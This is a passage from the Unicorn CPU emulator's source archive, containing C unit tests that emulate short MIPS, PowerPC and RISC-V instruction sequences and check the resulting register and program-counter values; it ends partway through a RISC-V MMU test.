uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_mips_el_ori(void) { uc_engine *uc; char code[] = "\x56\x34\x21\x34"; // ori $at, $at, 0x3456; int r_r1 = 0x6789; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_MIPS_REG_1, &r_r1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_1, &r_r1)); TEST_CHECK(r_r1 == 0x77df); OK(uc_close(uc)); } static void test_mips_eb_ori(void) { uc_engine *uc; char code[] = "\x34\x21\x34\x56"; // ori $at, $at, 0x3456; int r_r1 = 0x6789; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_MIPS_REG_1, &r_r1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_1, &r_r1)); TEST_CHECK(r_r1 == 0x77df); OK(uc_close(uc)); } static void test_mips_stop_at_branch(void) { uc_engine *uc; char code[] = "\x02\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"; // j 0x8; nop; int r_pc = 0x0; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); // Execute one instruction with branch delay slot. OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 1)); OK(uc_reg_read(uc, UC_MIPS_REG_PC, &r_pc)); // Even if we just execute one instruction, the instruction in the // delay slot would also be executed. TEST_CHECK(r_pc == code_start + 0x8); OK(uc_close(uc)); } static void test_mips_stop_at_delay_slot(void) { uc_engine *uc; char code[] = "\x02\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00"; // j 0x8; nop; int r_pc = 0x0; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); // Stop at the delay slot by design. OK(uc_emu_start(uc, code_start, code_start + 4, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_PC, &r_pc)); // The branch instruction isn't committed and the PC is not updated. // Users is responsible to restart emulation at the branch instruction. TEST_CHECK(r_pc == code_start); OK(uc_close(uc)); } static void test_mips_lwx_exception_issue_1314(void) { uc_engine *uc; char code[] = "\x0a\xc8\x79\x7e"; // lwx $t9, $t9($s3) int reg; uc_common_setup(&uc, UC_ARCH_MIPS, UC_MODE_32 | UC_MODE_LITTLE_ENDIAN, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x10000, 0x4000, UC_PROT_ALL)); // Enable DSP // https://s3-eu-west-1.amazonaws.com/downloads-mips/documents/MD00090-2B-MIPS32PRA-AFP-06.02.pdf OK(uc_reg_read(uc, UC_MIPS_REG_CP0_STATUS, ®)); reg |= (1 << 24); OK(uc_reg_write(uc, UC_MIPS_REG_CP0_STATUS, ®)); reg = 0; OK(uc_reg_write(uc, UC_MIPS_REG_1, ®)); OK(uc_reg_write(uc, UC_MIPS_REG_T9, ®)); reg = LEINT32(0xdeadbeef); OK(uc_mem_write(uc, 0x10000, ®, 4)); reg = 0x10000; OK(uc_reg_write(uc, UC_MIPS_REG_S3, ®)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_MIPS_REG_T9, ®)); TEST_CHECK(reg == 0xdeadbeef); OK(uc_close(uc)); } TEST_LIST = { {"test_mips_stop_at_branch", test_mips_stop_at_branch}, {"test_mips_stop_at_delay_slot", test_mips_stop_at_delay_slot}, {"test_mips_el_ori", test_mips_el_ori}, {"test_mips_eb_ori", test_mips_eb_ori}, {"test_mips_lwx_exception_issue_1314", test_mips_lwx_exception_issue_1314}, {NULL, NULL}};��������������������������������������������������������������unicorn-2.1.1/tests/unit/test_ppc.c�����������������������������������������������������������������0000664�0000000�0000000�00000006625�14675241067�0017323�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_ppc32_add(void) { uc_engine *uc; char code[] = "\x7f\x46\x1a\x14"; // ADD 26, 6, 3 int reg; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); reg = 42; OK(uc_reg_write(uc, UC_PPC_REG_3, ®)); reg = 1337; OK(uc_reg_write(uc, UC_PPC_REG_6, ®)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_PPC_REG_26, ®)); TEST_CHECK(reg == 1379); OK(uc_close(uc)); } // https://www.ibm.com/docs/en/aix/7.2?topic=set-fadd-fa-floating-add-instruction static void test_ppc32_fadd(void) { uc_engine *uc; char code[] = "\xfc\xc4\x28\x2a"; // fadd 6, 4, 5 uint32_t r_msr; uint64_t r_fpr4, r_fpr5, r_fpr6; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_reg_read(uc, UC_PPC_REG_MSR, &r_msr)); r_msr |= (1 << 13); // Big endian OK(uc_reg_write(uc, UC_PPC_REG_MSR, &r_msr)); // enable FP r_fpr4 = 0xC053400000000000ul; r_fpr5 = 0x400C000000000000ul; OK(uc_reg_write(uc, UC_PPC_REG_FPR4, &r_fpr4)); OK(uc_reg_write(uc, UC_PPC_REG_FPR5, &r_fpr5)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_PPC_REG_FPR6, &r_fpr6)); TEST_CHECK(r_fpr6 == 0xC052600000000000ul); OK(uc_close(uc)); } static void test_ppc32_sc_cb(uc_engine *uc, uint32_t intno, void *data) { uc_emu_stop(uc); return; } static void test_ppc32_sc(void) { uc_engine *uc; char code[] = "\x44\x00\x00\x02"; // sc uint32_t r_pc; uc_hook h; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INTR, test_ppc32_sc_cb, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_PPC_REG_PC, &r_pc)); TEST_CHECK(r_pc == code_start + 4); OK(uc_close(uc)); } static void test_ppc32_cr(void) { uc_engine *uc; uint32_t r_cr = 0x12345678; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, NULL, 0); OK(uc_reg_write(uc, UC_PPC_REG_CR, &r_cr)); r_cr = 0; OK(uc_reg_read(uc, UC_PPC_REG_CR, &r_cr)); TEST_CHECK(r_cr == 0x12345678); OK(uc_close(uc)); } static void test_ppc32_spr_time(void) { char code[] = ("\x7c\x76\x02\xa6" // mfspr r3, DEC "\x7c\x6d\x42\xa6" // mfspr r3, TBUr ); uc_engine *uc; uc_common_setup(&uc, UC_ARCH_PPC, UC_MODE_32 | UC_MODE_BIG_ENDIAN, code, sizeof(code) - 1); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } TEST_LIST = {{"test_ppc32_add", test_ppc32_add}, {"test_ppc32_fadd", test_ppc32_fadd}, {"test_ppc32_sc", test_ppc32_sc}, {"test_ppc32_cr", test_ppc32_cr}, {"test_ppc32_spr_time", test_ppc32_spr_time}, {NULL, NULL}};�����������������������������������������������������������������������������������������������������������unicorn-2.1.1/tests/unit/test_riscv.c���������������������������������������������������������������0000664�0000000�0000000�00000053635�14675241067�0017672�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������#include "unicorn_test.h" const uint64_t code_start = 0x1000; const uint64_t code_len = 0x4000; static void uc_common_setup(uc_engine **uc, uc_arch arch, uc_mode mode, const char *code, uint64_t size) { OK(uc_open(arch, mode, uc)); OK(uc_mem_map(*uc, code_start, code_len, UC_PROT_ALL)); OK(uc_mem_write(*uc, code_start, code, size)); } static void test_riscv32_nop(void) { uc_engine *uc; char code[] = "\x13\x00\x00\x00"; // nop uint32_t r_t0 = 0x1234; uint32_t r_t1 = 0x5678; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); TEST_CHECK(r_t0 == 0x1234); TEST_CHECK(r_t1 == 0x5678); OK(uc_close(uc)); } static void test_riscv64_nop(void) { uc_engine *uc; char code[] = "\x13\x00\x00\x00"; // nop uint64_t r_t0 = 0x1234; uint64_t r_t1 = 0x5678; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); TEST_CHECK(r_t0 == 0x1234); TEST_CHECK(r_t1 == 0x5678); OK(uc_close(uc)); } static void test_riscv32_until_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint32_t r_t0 = 0x1234; uint32_t r_t1 = 0x7890; uint32_t r_pc = 0x0000; uint32_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv64_until_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint64_t r_t0 = 0x1234; uint64_t r_t1 = 0x7890; uint64_t r_pc = 0x0000; uint64_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv32_3steps_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint32_t r_t0 = 0x1234; uint32_t r_t1 = 0x7890; uint32_t r_pc = 0x0000; uint32_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, -1, 0, 3)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv64_3steps_pc_update(void) { uc_engine *uc; char code[] = "\x93\x02\x10\x00\x13\x03\x00\x02\x13\x01\x81\x00"; /* addi t0, zero, 1 addi t1, zero, 0x20 addi sp, sp, 8 */ uint64_t r_t0 = 0x1234; uint64_t r_t1 = 0x7890; uint64_t r_pc = 0x0000; uint64_t r_sp = 0x1234; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_write(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_write(uc, UC_RISCV_REG_SP, &r_sp)); // emulate the three instructions OK(uc_emu_start(uc, code_start, -1, 0, 3)); OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_reg_read(uc, UC_RISCV_REG_T1, &r_t1)); OK(uc_reg_read(uc, UC_RISCV_REG_SP, &r_sp)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_t0 == 0x1); TEST_CHECK(r_t1 == 0x20); TEST_CHECK(r_sp == 0x123c); TEST_CHECK(r_pc == (code_start + sizeof(code) - 1)); OK(uc_close(uc)); } static void test_riscv32_fp_move(void) { uc_engine *uc; char code[] = "\xd3\x81\x10\x22"; // fmv.d f3, f1 uint64_t r_f1 = 0x123456781a2b3c4dULL; uint64_t r_f3 = 0x56780246aaaabbbbULL; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); // initialize machine registers uc_reg_write(uc, UC_RISCV_REG_F1, &r_f1); uc_reg_write(uc, UC_RISCV_REG_F3, &r_f3); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); OK(uc_reg_read(uc, UC_RISCV_REG_F1, &r_f1)); OK(uc_reg_read(uc, UC_RISCV_REG_F3, &r_f3)); TEST_CHECK(r_f1 == 0x123456781a2b3c4dULL); TEST_CHECK(r_f3 == 0x123456781a2b3c4dULL); uc_close(uc); } static void test_riscv64_fp_move(void) { uc_engine *uc; char code[] = "\xd3\x81\x10\x22"; // fmv.d f3, f1 uint64_t r_f1 = 0x123456781a2b3c4dULL; uint64_t r_f3 = 0x56780246aaaabbbbULL; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_F1, &r_f1)); OK(uc_reg_write(uc, UC_RISCV_REG_F3, &r_f3)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); OK(uc_reg_read(uc, UC_RISCV_REG_F1, &r_f1)); OK(uc_reg_read(uc, UC_RISCV_REG_F3, &r_f3)); TEST_CHECK(r_f1 == 0x123456781a2b3c4dULL); TEST_CHECK(r_f3 == 0x123456781a2b3c4dULL); uc_close(uc); } static void test_riscv64_fp_move_from_int(void) { uc_engine *uc; // https://riscv.org/wp-content/uploads/2017/05/riscv-spec-v2.2.pdf // https://five-embeddev.com/quickref/csrs.html // We have to enable mstatus.fs char code[] = "\xf3\x90\x01\x30\x53\x00\x0b\xf2"; // csrrw x2, mstatus, x3; // fmvd.d.x ft0, s6 uint64_t r_ft0 = 0x12341234; uint64_t r_s6 = 0x56785678; uint64_t r_x3 = 0x6000; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_write(uc, UC_RISCV_REG_S6, &r_s6)); // mstatus.fs OK(uc_reg_write(uc, UC_RISCV_REG_X3, &r_x3)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 2)); OK(uc_reg_read(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_read(uc, UC_RISCV_REG_S6, &r_s6)); TEST_CHECK(r_ft0 == 0x56785678); TEST_CHECK(r_s6 == 0x56785678); uc_close(uc); } static void test_riscv64_fp_move_from_int_reg_write(void) { uc_engine *uc; char code[] = "\x53\x00\x0b\xf2"; // fmvd.d.x ft0, s6 uint64_t r_ft0 = 0x12341234; uint64_t r_s6 = 0x56785678; uint64_t r_mstatus = 0x6000; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_write(uc, UC_RISCV_REG_S6, &r_s6)); // mstatus.fs OK(uc_reg_write(uc, UC_RISCV_REG_MSTATUS, &r_mstatus)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); OK(uc_reg_read(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_read(uc, UC_RISCV_REG_S6, &r_s6)); TEST_CHECK(r_ft0 == 0x56785678); TEST_CHECK(r_s6 == 0x56785678); OK(uc_close(uc)); } static void test_riscv64_fp_move_to_int(void) { uc_engine *uc; // https://riscv.org/wp-content/uploads/2017/05/riscv-spec-v2.2.pdf // https://five-embeddev.com/quickref/csrs.html // We have to enable mstatus.fs char code[] = "\xf3\x90\x01\x30\x53\x0b\x00\xe2"; // csrrw x2, mstatus, x3; // fmv.x.d s6, ft0 uint64_t r_ft0 = 0x12341234; uint64_t r_s6 = 0x56785678; uint64_t r_x3 = 0x6000; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // initialize machine registers OK(uc_reg_write(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_write(uc, UC_RISCV_REG_S6, &r_s6)); // mstatus.fs OK(uc_reg_write(uc, UC_RISCV_REG_X3, &r_x3)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 2)); OK(uc_reg_read(uc, UC_RISCV_REG_FT0, &r_ft0)); OK(uc_reg_read(uc, UC_RISCV_REG_S6, &r_s6)); TEST_CHECK(r_ft0 == 0x12341234); TEST_CHECK(r_s6 == 0x12341234); uc_close(uc); } static void test_riscv64_code_patching(void) { uc_engine *uc; char code[] = "\x93\x82\x12\x00"; // addi t0, t0, 0x1 uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // Zero out t0 and t1 uint64_t r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); // emulate the instruction OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 == 0x1); // patch instruction char patch_code[] = "\x93\x82\xf2\x7f"; // addi t0, t0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); // zero out t0 r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(patch_code) - 1, 0, 0)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 != 0x1); TEST_CHECK(r_t0 == 0x7ff); OK(uc_close(uc)); } // Need to flush the cache before running the emulation after patching static void test_riscv64_code_patching_count(void) { uc_engine *uc; char code[] = "\x93\x82\x12\x00"; // addi t0, t0, 0x1 uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); // Zero out t0 and t1 uint64_t r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); // emulate the instruction OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 == 0x1); // patch instruction char patch_code[] = "\x93\x82\xf2\x7f"; // addi t0, t0, 0x7FF OK(uc_mem_write(uc, code_start, patch_code, sizeof(patch_code) - 1)); OK(uc_ctl_remove_cache(uc, code_start, code_start + sizeof(patch_code) - 1)); // zero out t0 r_t0 = 0x0; OK(uc_reg_write(uc, UC_RISCV_REG_T0, &r_t0)); OK(uc_emu_start(uc, code_start, -1, 0, 1)); // check value OK(uc_reg_read(uc, UC_RISCV_REG_T0, &r_t0)); TEST_CHECK(r_t0 != 0x1); TEST_CHECK(r_t0 == 0x7ff); OK(uc_close(uc)); } static void test_riscv64_ecall_cb(uc_engine *uc, uint32_t intno, void *data) { uc_emu_stop(uc); return; } static void test_riscv64_ecall(void) { uc_engine *uc; char code[] = "\x73\x00\x00\x00"; // ecall uint64_t r_pc; uc_hook h; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &h, UC_HOOK_INTR, test_riscv64_ecall_cb, NULL, 1, 0)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_pc == code_start + 4); OK(uc_close(uc)); } static uint64_t test_riscv32_mmio_map_read_cb(uc_engine *uc, uint64_t offset, unsigned size, void *data) { int r_a4; OK(uc_reg_read(uc, UC_RISCV_REG_A4, &r_a4)); TEST_CHECK(r_a4 == 0x40021 << 12); TEST_CHECK(offset == 0x21018); return 0; } static void test_riscv32_mmio_map(void) { uc_engine *uc; // 37 17 02 40 lui a4, 0x40021 // 1c 4f c.lw a5, 0x18(a4) // char code[] = "\x37\x17\x02\x40\x1c\x4f"; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); OK(uc_mmio_map(uc, 0x40000000, 0x40000, test_riscv32_mmio_map_read_cb, NULL, NULL, NULL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static void test_riscv32_map(void) { uc_engine *uc; // 37 17 02 40 lui a4, 0x40021 // 1c 4f c.lw a5, 0x18(a4) // char code[] = "\x37\x17\x02\x40\x1c\x4f"; uint64_t val = 0xdeadbeef; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV32, code, sizeof(code) - 1); OK(uc_mem_map(uc, 0x40000000, 0x40000, UC_PROT_ALL)); OK(uc_mem_write(uc, 0x40000000 + 0x21018, &val, 8)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_A5, &val)); TEST_CHECK(val == 0xdeadbeef); OK(uc_close(uc)); } static uint64_t test_riscv64_mmio_map_read_cb(uc_engine *uc, uint64_t offset, unsigned size, void *data) { uint64_t r_a4; OK(uc_reg_read(uc, UC_RISCV_REG_A4, &r_a4)); TEST_CHECK(r_a4 == 0x40021 << 12); TEST_CHECK(offset == 0x21018); return 0; } static void test_riscv64_mmio_map(void) { uc_engine *uc; // 37 17 02 40 lui a4, 0x40021 // 1c 4f c.lw a5, 0x18(a4) // char code[] = "\x37\x17\x02\x40\x1c\x4f"; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_mmio_map(uc, 0x40000000, 0x40000, test_riscv64_mmio_map_read_cb, NULL, NULL, NULL)); OK(uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_close(uc)); } static bool test_riscv_correct_address_in_small_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7F00); return false; } static void test_riscv_correct_address_in_small_jump_hook(void) { uc_engine *uc; // li 0x7F00, x5 > lui t0, 8; addiw t0, t0, -256; // jr x5 char code[] = "\xb7\x82\x00\x00\x9b\x82\x02\xf0\x67\x80\x02\x00"; uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_riscv_correct_address_in_small_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7F00); TEST_CHECK(r_pc == 0x7F00); OK(uc_close(uc)); } static bool test_riscv_correct_address_in_long_jump_hook_callback( uc_engine *uc, int type, uint64_t address, int size, int64_t value, void *user_data) { // Check registers uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); // Check address // printf("%lx\n", address); TEST_CHECK(address == 0x7FFFFFFFFFFFFF00); return false; } static void test_riscv_correct_address_in_long_jump_hook(void) { uc_engine *uc; // li 0x7FFFFFFFFFFFFF00, x5 > addi t0, zero, -1; slli t0, t0, 63; addi // t0, t0, -256; jr x5 char code[] = "\x93\x02\xf0\xff\x93\x92\xf2\x03\x93\x82\x02\xf0\x67\x80\x02\x00"; uint64_t r_x5 = 0x0; uint64_t r_pc = 0x0; uc_hook hook; uc_common_setup(&uc, UC_ARCH_RISCV, UC_MODE_RISCV64, code, sizeof(code) - 1); OK(uc_hook_add(uc, &hook, UC_HOOK_MEM_UNMAPPED, test_riscv_correct_address_in_long_jump_hook_callback, NULL, 1, 0)); uc_assert_err( UC_ERR_FETCH_UNMAPPED, uc_emu_start(uc, code_start, code_start + sizeof(code) - 1, 0, 0)); OK(uc_reg_read(uc, UC_RISCV_REG_X5, &r_x5)); OK(uc_reg_read(uc, UC_RISCV_REG_PC, &r_pc)); TEST_CHECK(r_x5 == 0x7FFFFFFFFFFFFF00); TEST_CHECK(r_pc == 0x7FFFFFFFFFFFFF00); OK(uc_close(uc)); } static void test_riscv_mmu_prepare_tlb(uc_engine *uc, uint32_t data_address, uint32_t code_address) { uint64_t tlbe; uint32_t sptbr = 0x2000; OK(uc_mem_map(uc, sptbr, 0x3000, UC_PROT_ALL)); // tlb base tlbe = ((sptbr + 0x1000) >> 2) | 1; OK(uc_mem_write(uc, sptbr, &tlbe, sizeof(tlbe))); tlbe = ((sptbr + 0x2000) >> 2) | 1; OK(uc_mem_write(uc, sptbr + 0x1000, &tlbe, sizeof(tlbe))); tlbe = (code_address >> 2) | (7 << 1) | 1; OK(uc_mem_write(uc, sptbr + 0x2000 + 0x15 * 8, &tlbe, sizeof(tlbe))); tlbe = (data_address >> 2) | (7 << 1) | 1; OK(uc_mem_write(uc, sptbr + 0x2000 + 0x16 * 8, &tlbe, sizeof(tlbe))); } static void test_riscv_mmu_hook_code(uc_engine *uc, uint64_t address, uint32_t size, void *userdata) { if (address == 0x15010) { OK(uc_emu_stop(uc)); } } static void test_riscv_mmu(void) { uc_engine *uc; uc_hook h; uint32_t code_address = 0x5000; uint32_t data_address = 0x6000; uint32_t data_value = 0x41414141; uint32_t data_result = 0; /* li t3, (8 << 60) | 2 csrw sptbr, t3 li t0, (1 << 11) | (1 << 5) csrw mstatus, t0 la t1, 0x15000 csrw mepc, t1 mret */ char code_m[] = "\x1b\x0e\xf0\xff" "\x13\x1e\xfe\x03" "\x13\x0e\x2e\x00" "\x73\x10\x0e\x18" 